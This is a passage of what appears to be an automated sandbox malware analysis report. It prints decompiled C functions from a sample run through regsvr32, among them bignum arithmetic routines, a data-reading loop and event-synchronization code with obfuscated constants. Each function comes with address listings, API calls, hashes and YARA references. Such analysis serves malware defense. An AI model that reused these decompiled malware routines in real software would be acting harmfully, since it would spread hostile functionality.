												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}




































                                                                                                                                                                                                                                    0x023e52fe
                                                                                                                                                                                                                                    0x023e5307
                                                                                                                                                                                                                                    0x023e5308
                                                                                                                                                                                                                                    0x023e530c
                                                                                                                                                                                                                                    0x023e5312
                                                                                                                                                                                                                                    0x023e5318
                                                                                                                                                                                                                                    0x023e5321
                                                                                                                                                                                                                                    0x023e5327
                                                                                                                                                                                                                                    0x023e5331
                                                                                                                                                                                                                                    0x023e5333
                                                                                                                                                                                                                                    0x023e5339
                                                                                                                                                                                                                                    0x023e533e
                                                                                                                                                                                                                                    0x023e5349
                                                                                                                                                                                                                                    0x023e5351
                                                                                                                                                                                                                                    0x023e5354
                                                                                                                                                                                                                                    0x023e5477
                                                                                                                                                                                                                                    0x023e535a
                                                                                                                                                                                                                                    0x023e535a
                                                                                                                                                                                                                                    0x023e5367
                                                                                                                                                                                                                                    0x023e536d
                                                                                                                                                                                                                                    0x023e5373
                                                                                                                                                                                                                                    0x023e5377
                                                                                                                                                                                                                                    0x023e537d
                                                                                                                                                                                                                                    0x023e538a
                                                                                                                                                                                                                                    0x023e538e
                                                                                                                                                                                                                                    0x023e5394
                                                                                                                                                                                                                                    0x023e5397
                                                                                                                                                                                                                                    0x023e539d
                                                                                                                                                                                                                                    0x023e53a3
                                                                                                                                                                                                                                    0x023e53a9
                                                                                                                                                                                                                                    0x023e53ac
                                                                                                                                                                                                                                    0x023e53af
                                                                                                                                                                                                                                    0x023e53b5
                                                                                                                                                                                                                                    0x023e53be
                                                                                                                                                                                                                                    0x023e53c4
                                                                                                                                                                                                                                    0x023e53c5
                                                                                                                                                                                                                                    0x023e53c8
                                                                                                                                                                                                                                    0x023e53c9
                                                                                                                                                                                                                                    0x023e53ca
                                                                                                                                                                                                                                    0x023e53d2
                                                                                                                                                                                                                                    0x023e53d3
                                                                                                                                                                                                                                    0x023e53d4
                                                                                                                                                                                                                                    0x023e53d6
                                                                                                                                                                                                                                    0x023e53da
                                                                                                                                                                                                                                    0x023e53de
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e53e4
                                                                                                                                                                                                                                    0x023e53ed
                                                                                                                                                                                                                                    0x023e53f3
                                                                                                                                                                                                                                    0x023e53fd
                                                                                                                                                                                                                                    0x023e5401
                                                                                                                                                                                                                                    0x023e5403
                                                                                                                                                                                                                                    0x023e5410
                                                                                                                                                                                                                                    0x023e5414
                                                                                                                                                                                                                                    0x023e541c
                                                                                                                                                                                                                                    0x023e5421
                                                                                                                                                                                                                                    0x023e5433
                                                                                                                                                                                                                                    0x023e5435
                                                                                                                                                                                                                                    0x023e543b
                                                                                                                                                                                                                                    0x023e543b
                                                                                                                                                                                                                                    0x023e5444
                                                                                                                                                                                                                                    0x023e5444
                                                                                                                                                                                                                                    0x023e5446
                                                                                                                                                                                                                                    0x023e544c
                                                                                                                                                                                                                                    0x023e544c
                                                                                                                                                                                                                                    0x023e544f
                                                                                                                                                                                                                                    0x023e5455
                                                                                                                                                                                                                                    0x023e5458
                                                                                                                                                                                                                                    0x023e5461
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e5461
                                                                                                                                                                                                                                    0x023e53b5
                                                                                                                                                                                                                                    0x023e53af
                                                                                                                                                                                                                                    0x023e5397
                                                                                                                                                                                                                                    0x023e5467
                                                                                                                                                                                                                                    0x023e5467
                                                                                                                                                                                                                                    0x023e546d
                                                                                                                                                                                                                                    0x023e546d
                                                                                                                                                                                                                                    0x023e5473
                                                                                                                                                                                                                                    0x023e5473
                                                                                                                                                                                                                                    0x023e547c
                                                                                                                                                                                                                                    0x023e5482
                                                                                                                                                                                                                                    0x023e5482
                                                                                                                                                                                                                                    0x023e533e
                                                                                                                                                                                                                                    0x023e548b

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(023EC2B0), ref: 023E5349
                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(00000000,0076006F), ref: 023E542B
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 023E5444
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 023E5473
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String$Free$Alloclstrcmp
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1885612795-0
                                                                                                                                                                                                                                    • Opcode ID: 9c1365c35febf9cbd4ba0dfbfdecdf3e113b7e5837d7222a81e700f8894e5f32
                                                                                                                                                                                                                                    • Instruction ID: 613e51d980117abe2802b5f0abab0999d50f119891bf0ae4f05c006dfb4faf94
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c1365c35febf9cbd4ba0dfbfdecdf3e113b7e5837d7222a81e700f8894e5f32
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53513C71E00519EFCF10DFA8C4889AEB7BAEF88709B148598E916EB250D7719D05CFA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E1017, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                                                                                    			E023E1017(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E023EA7AA(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E023E968F(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E023E8967(_t101,  &_v236, _a8, _t96 - _t81);
					E023E8967(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E023E968F(_t101, 0x23ed1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E023E968F(_a16, _a4);
						E023E1D6C(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L023EB0C8();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L023EB0C2();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E023E1FB1(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E023E8B62(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E023E9100(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x23ed1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                                                                                                                                                                                                    0x023e101a
                                                                                                                                                                                                                                    0x023e1026
                                                                                                                                                                                                                                    0x023e102c
                                                                                                                                                                                                                                    0x023e1031
                                                                                                                                                                                                                                    0x023e1035
                                                                                                                                                                                                                                    0x023e1192
                                                                                                                                                                                                                                    0x023e1196
                                                                                                                                                                                                                                    0x023e1196
                                                                                                                                                                                                                                    0x023e103b
                                                                                                                                                                                                                                    0x023e103f
                                                                                                                                                                                                                                    0x023e1045
                                                                                                                                                                                                                                    0x023e1046
                                                                                                                                                                                                                                    0x023e1051
                                                                                                                                                                                                                                    0x023e1057
                                                                                                                                                                                                                                    0x023e105c
                                                                                                                                                                                                                                    0x023e105f
                                                                                                                                                                                                                                    0x023e1079
                                                                                                                                                                                                                                    0x023e1085
                                                                                                                                                                                                                                    0x023e108e
                                                                                                                                                                                                                                    0x023e1098
                                                                                                                                                                                                                                    0x023e109d
                                                                                                                                                                                                                                    0x023e109f
                                                                                                                                                                                                                                    0x023e10a2
                                                                                                                                                                                                                                    0x023e1150
                                                                                                                                                                                                                                    0x023e1156
                                                                                                                                                                                                                                    0x023e1167
                                                                                                                                                                                                                                    0x023e117a
                                                                                                                                                                                                                                    0x023e118a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e118f
                                                                                                                                                                                                                                    0x023e10ab
                                                                                                                                                                                                                                    0x023e10b2
                                                                                                                                                                                                                                    0x023e10b6
                                                                                                                                                                                                                                    0x023e10bc
                                                                                                                                                                                                                                    0x023e10be
                                                                                                                                                                                                                                    0x023e10c0
                                                                                                                                                                                                                                    0x023e10c2
                                                                                                                                                                                                                                    0x023e10c4
                                                                                                                                                                                                                                    0x023e10ce
                                                                                                                                                                                                                                    0x023e10d3
                                                                                                                                                                                                                                    0x023e10d5
                                                                                                                                                                                                                                    0x023e10d7
                                                                                                                                                                                                                                    0x023e10d8
                                                                                                                                                                                                                                    0x023e10d9
                                                                                                                                                                                                                                    0x023e10da
                                                                                                                                                                                                                                    0x023e10e1
                                                                                                                                                                                                                                    0x023e10e8
                                                                                                                                                                                                                                    0x023e10eb
                                                                                                                                                                                                                                    0x023e10eb
                                                                                                                                                                                                                                    0x023e10b8
                                                                                                                                                                                                                                    0x023e10b8
                                                                                                                                                                                                                                    0x023e10b8
                                                                                                                                                                                                                                    0x023e10f3
                                                                                                                                                                                                                                    0x023e10fb
                                                                                                                                                                                                                                    0x023e1104
                                                                                                                                                                                                                                    0x023e1109
                                                                                                                                                                                                                                    0x023e1109
                                                                                                                                                                                                                                    0x023e110e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e1110
                                                                                                                                                                                                                                    0x023e1113
                                                                                                                                                                                                                                    0x023e111d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e111f
                                                                                                                                                                                                                                    0x023e111f
                                                                                                                                                                                                                                    0x023e1129
                                                                                                                                                                                                                                    0x023e1109
                                                                                                                                                                                                                                    0x023e110e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e110e
                                                                                                                                                                                                                                    0x023e1133
                                                                                                                                                                                                                                    0x023e1136
                                                                                                                                                                                                                                    0x023e1139
                                                                                                                                                                                                                                    0x023e1140
                                                                                                                                                                                                                                    0x023e1140
                                                                                                                                                                                                                                    0x023e114d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e114d
                                                                                                                                                                                                                                    0x023e1048
                                                                                                                                                                                                                                    0x023e104c
                                                                                                                                                                                                                                    0x023e104d
                                                                                                                                                                                                                                    0x023e104f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e104f
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 023E10C4
                                                                                                                                                                                                                                    • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 023E10DA
                                                                                                                                                                                                                                    • memset.NTDLL ref: 023E117A
                                                                                                                                                                                                                                    • memset.NTDLL ref: 023E118A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$_allmul_aulldiv
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3041852380-0
                                                                                                                                                                                                                                    • Opcode ID: 471187063a0d9cbb9e7f197f3afc9dfb86aa74682a89a9c9410a4fb847089b11
                                                                                                                                                                                                                                    • Instruction ID: b766a3093b39bd1bfe95ac63e294b63ecb21fa5139948545ae24ed605c4cfed3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 471187063a0d9cbb9e7f197f3afc9dfb86aa74682a89a9c9410a4fb847089b11
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D418171A00269ABDF20DEA8DC44BEE777AEF44310F108529E95BA72C0D770AD5D8F90
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023EA9AB, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,00000008,76D24D40), ref: 023EA9BD
                                                                                                                                                                                                                                      • Part of subcall function 023E2049: RtlAllocateHeap.NTDLL(00000000,00000000,023E7E50), ref: 023E2055
                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 023EAA31
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 023EAA54
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 023EAAFF
                                                                                                                                                                                                                                      • Part of subcall function 023E9039: HeapFree.KERNEL32(00000000,00000000,023E7F18,00000000,?,?,00000000), ref: 023E9045
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 943265810-0
                                                                                                                                                                                                                                    • Opcode ID: 07baa49147a1cbb26dd7f2ee41dce3605148e94b61aac0a8a68d664581aa22af
                                                                                                                                                                                                                                    • Instruction ID: 2da8e723362c551bdcf6cef5bd63a5fd44c90e427efdd4b83024760beec1f6e7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07baa49147a1cbb26dd7f2ee41dce3605148e94b61aac0a8a68d664581aa22af
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E44148B1940208BBDF319FA5DC88EAB7BBDEF89704F004929F153E50D0E771A959DA20
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E39BF, Relevance: 6.1, APIs: 4, Instructions: 112COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 39%
                                                                                                                                                                                                                                    			E023E39BF(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				intOrPtr _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				void* _t53;
				long _t58;
				void* _t59;

				_t53 = __ecx;
				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				_push( &_v8);
				_push(4);
				_push( &_v20);
				_push( *((intOrPtr*)(_t59 + 0x18)));
				if( *0x23ed134() != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0x23ed168(0, 1,  &_v12);
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E023E2049(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
						_t39 = _v12;
						_t56 =  *_t39;
						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
						ResetEvent( *(_t59 + 0x1c));
						_push( &_v8);
						_push(0x1000);
						_push(_v16);
						_push( *((intOrPtr*)(_t59 + 0x18)));
						if( *0x23ed134() != 0) {
							goto L13;
						}
						_t58 = GetLastError();
						if(_t58 != 0x3e5) {
							L15:
							E023E9039(_v16);
							if(_t58 == 0) {
								_t58 = E023E7A07(_v12, _t59);
							}
							goto L18;
						}
						_t58 = E023E1C47( *(_t59 + 0x1c), _t56, 0xffffffff);
						if(_t58 != 0) {
							goto L15;
						}
						_t58 =  *((intOrPtr*)(_t59 + 0x28));
						if(_t58 != 0) {
							goto L15;
						}
						L13:
						_t58 = 0;
						if(_v8 == 0) {
							goto L15;
						}
						_push(0);
						_push(_v8);
						_push(_v16);
					}
				}
				_t58 = GetLastError();
				if(_t58 != 0x3e5) {
					L4:
					if(_t58 != 0) {
						goto L21;
					}
					goto L5;
				}
				_t58 = E023E1C47( *(_t59 + 0x1c), _t53, 0xffffffff);
				if(_t58 != 0) {
					goto L21;
				}
				_t58 =  *((intOrPtr*)(_t59 + 0x28));
				goto L4;
			}














                                                                                                                                                                                                                                    0x023e39bf
                                                                                                                                                                                                                                    0x023e39ce
                                                                                                                                                                                                                                    0x023e39d3
                                                                                                                                                                                                                                    0x023e39d5
                                                                                                                                                                                                                                    0x023e39da
                                                                                                                                                                                                                                    0x023e39db
                                                                                                                                                                                                                                    0x023e39e0
                                                                                                                                                                                                                                    0x023e39e1
                                                                                                                                                                                                                                    0x023e39ec
                                                                                                                                                                                                                                    0x023e3a1d
                                                                                                                                                                                                                                    0x023e3a22
                                                                                                                                                                                                                                    0x023e3ae5
                                                                                                                                                                                                                                    0x023e3ae8
                                                                                                                                                                                                                                    0x023e3aee
                                                                                                                                                                                                                                    0x023e3aee
                                                                                                                                                                                                                                    0x023e3a2f
                                                                                                                                                                                                                                    0x023e3a37
                                                                                                                                                                                                                                    0x023e3ae2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e3ae2
                                                                                                                                                                                                                                    0x023e3a42
                                                                                                                                                                                                                                    0x023e3a49
                                                                                                                                                                                                                                    0x023e3a4c
                                                                                                                                                                                                                                    0x023e3ad4
                                                                                                                                                                                                                                    0x023e3ad5
                                                                                                                                                                                                                                    0x023e3ad5
                                                                                                                                                                                                                                    0x023e3adb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e3adb
                                                                                                                                                                                                                                    0x023e3a52
                                                                                                                                                                                                                                    0x023e3a54
                                                                                                                                                                                                                                    0x023e3a5a
                                                                                                                                                                                                                                    0x023e3a5b
                                                                                                                                                                                                                                    0x023e3a5b
                                                                                                                                                                                                                                    0x023e3a5e
                                                                                                                                                                                                                                    0x023e3a61
                                                                                                                                                                                                                                    0x023e3a67
                                                                                                                                                                                                                                    0x023e3a6c
                                                                                                                                                                                                                                    0x023e3a6d
                                                                                                                                                                                                                                    0x023e3a72
                                                                                                                                                                                                                                    0x023e3a75
                                                                                                                                                                                                                                    0x023e3a80
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e3a88
                                                                                                                                                                                                                                    0x023e3a90
                                                                                                                                                                                                                                    0x023e3ab9
                                                                                                                                                                                                                                    0x023e3abc
                                                                                                                                                                                                                                    0x023e3ac3
                                                                                                                                                                                                                                    0x023e3ace
                                                                                                                                                                                                                                    0x023e3ace
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e3ac3
                                                                                                                                                                                                                                    0x023e3a9c
                                                                                                                                                                                                                                    0x023e3aa0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e3aa2
                                                                                                                                                                                                                                    0x023e3aa7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e3aa9
                                                                                                                                                                                                                                    0x023e3aa9
                                                                                                                                                                                                                                    0x023e3aae
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e3ab0
                                                                                                                                                                                                                                    0x023e3ab1
                                                                                                                                                                                                                                    0x023e3ab4
                                                                                                                                                                                                                                    0x023e3ab4
                                                                                                                                                                                                                                    0x023e3a5b
                                                                                                                                                                                                                                    0x023e39f4
                                                                                                                                                                                                                                    0x023e39fc
                                                                                                                                                                                                                                    0x023e3a15
                                                                                                                                                                                                                                    0x023e3a17
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e3a17
                                                                                                                                                                                                                                    0x023e3a08
                                                                                                                                                                                                                                    0x023e3a0c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e3a12
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 023E39D5
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 023E39EE
                                                                                                                                                                                                                                      • Part of subcall function 023E1C47: WaitForMultipleObjects.KERNEL32(00000002,023EAA72,00000000,023EAA72,?,?,?,023EAA72,0000EA60), ref: 023E1C62
                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 023E3A67
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 023E3A82
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorEventLastReset$MultipleObjectsWait
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2394032930-0
                                                                                                                                                                                                                                    • Opcode ID: 520e7cb231e85d935ed184b9584c7ec27547b3f51f4a2e0f7e017b3b221a4c06
                                                                                                                                                                                                                                    • Instruction ID: 73c34d6f2d799dcda6467d2162a06f66d000699eadbb7f02267c779361a8862d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 520e7cb231e85d935ed184b9584c7ec27547b3f51f4a2e0f7e017b3b221a4c06
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C319032A00614EBCF21DBA5CC44B7EB7BDAF88364F1005A9E557A75D0EB30E989DB10
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E42EA, Relevance: 6.1, APIs: 4, Instructions: 95synchronizationCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                    			E023E42EA(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				void* _t26;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x23ed270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x23ed27c; // 0x28da5a8
				_t3 = _t8 + 0x23ee862; // 0x61636f4c
				_t25 = 0;
				_t30 = E023E7A9A(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x23ed2a8, 1, 0, _t30);
					E023E9039(_t30);
				}
				_t12 =  *0x23ed25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E023E757F() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E023E205E(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x23ed0f0( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E023EA501(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}















                                                                                                                                                                                                                                    0x023e42eb
                                                                                                                                                                                                                                    0x023e42f2
                                                                                                                                                                                                                                    0x023e42fc
                                                                                                                                                                                                                                    0x023e4300
                                                                                                                                                                                                                                    0x023e4306
                                                                                                                                                                                                                                    0x023e4315
                                                                                                                                                                                                                                    0x023e431c
                                                                                                                                                                                                                                    0x023e4320
                                                                                                                                                                                                                                    0x023e4332
                                                                                                                                                                                                                                    0x023e4334
                                                                                                                                                                                                                                    0x023e4334
                                                                                                                                                                                                                                    0x023e4339
                                                                                                                                                                                                                                    0x023e4340
                                                                                                                                                                                                                                    0x023e4395
                                                                                                                                                                                                                                    0x023e4395
                                                                                                                                                                                                                                    0x023e439b
                                                                                                                                                                                                                                    0x023e439d
                                                                                                                                                                                                                                    0x023e439d
                                                                                                                                                                                                                                    0x023e43a7
                                                                                                                                                                                                                                    0x023e43ab
                                                                                                                                                                                                                                    0x023e43bd
                                                                                                                                                                                                                                    0x023e43bd
                                                                                                                                                                                                                                    0x023e43c1
                                                                                                                                                                                                                                    0x023e43c7
                                                                                                                                                                                                                                    0x023e43c7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e4359
